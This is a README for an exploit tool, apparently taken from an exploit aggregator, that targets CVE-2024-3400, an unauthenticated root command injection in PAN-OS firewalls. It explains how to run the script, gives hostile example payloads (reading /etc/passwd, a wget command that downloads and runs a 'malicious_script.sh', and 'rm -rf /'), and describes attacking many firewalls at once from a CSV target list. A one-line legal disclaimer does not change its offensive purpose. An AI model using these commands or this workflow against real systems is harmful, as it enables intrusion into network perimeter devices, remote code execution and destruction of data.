## https://sploitus.com/exploit?id=05EB92E6-91F0-588D-9577-87260373672B
# PAN-OS Firewall Exploit Script
This script is designed to demonstrate the exploitation of vulnerabilities in PAN-OS firewalls. It sends a specially crafted payload to the firewall's API endpoint to execute arbitrary commands. This exploit specifically targets CVE-2024-3400, a command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions. Distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
**Note:** Please ensure that you only use this script for legal and ethical purposes, and only on machines that you have permission to test on.
## Usage
To use this project, follow these steps:
1. Clone this repo:
```bash
git clone https://github.com/DrewskyDev/CVE-2024-3400
2. Change directory to the repo:
```bash
cd CVE-2024-3400
3. Install the required modules:
```bash
pip install -r requirements.txt
4. Run the python script.
```bash
python3 exploit.py
Follow the prompts to enter the IP address of the vulnerable PAN-OS firewall and the payload to execute.
## Example Payloads
1. List Directory Contents:
```bash
ls -la
2. Print the contents of a specific file:
```bash
cat /etc/passwd
3. Print the username of the current user who is logged in to the system:
```bash
whoami
4. Download a file from the internet (requires wget or curl installed):
```bash
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
5. Be very careful with this one:
```bash
rm -rf /
## Instructions for Secure Usage
### SSL Certificate Verification
The script will ask for the file path of the SSL certificate from the PAN-OS firewall server. If no path is given, the script will automatically set SSL verification to false, effectively disabling SSL.
## CSV File Instructions
This script allows you to exploit multiple targets of vulnerable PAN-OS Firewalls using a CSV file. Below are the instructions for formatting the CSV file correctly:
### CSV File Format:
The CSV file should have three columns:
ipaddress: The IP address of the vulnerable PAN-OS Firewall.
payload: The payload to execute on the firewall.
path/to/root_CA_certificate.pem: The path to the root CA certificate (leave blank if certificate verification is disabled).
- Example CSV File:
```bash
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
### Instructions:
Create a CSV file with the specified format.
Fill in the IP addresses, payloads, and root CA certificate paths (if applicable).
Make sure to provide valid paths to the root CA certificates or leave the field blank if certificate verification is disabled.
Run the script and choose the option to use the CSV file when prompted.
## References
- https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
- https://security.paloaltonetworks.com/CVE-2024-3400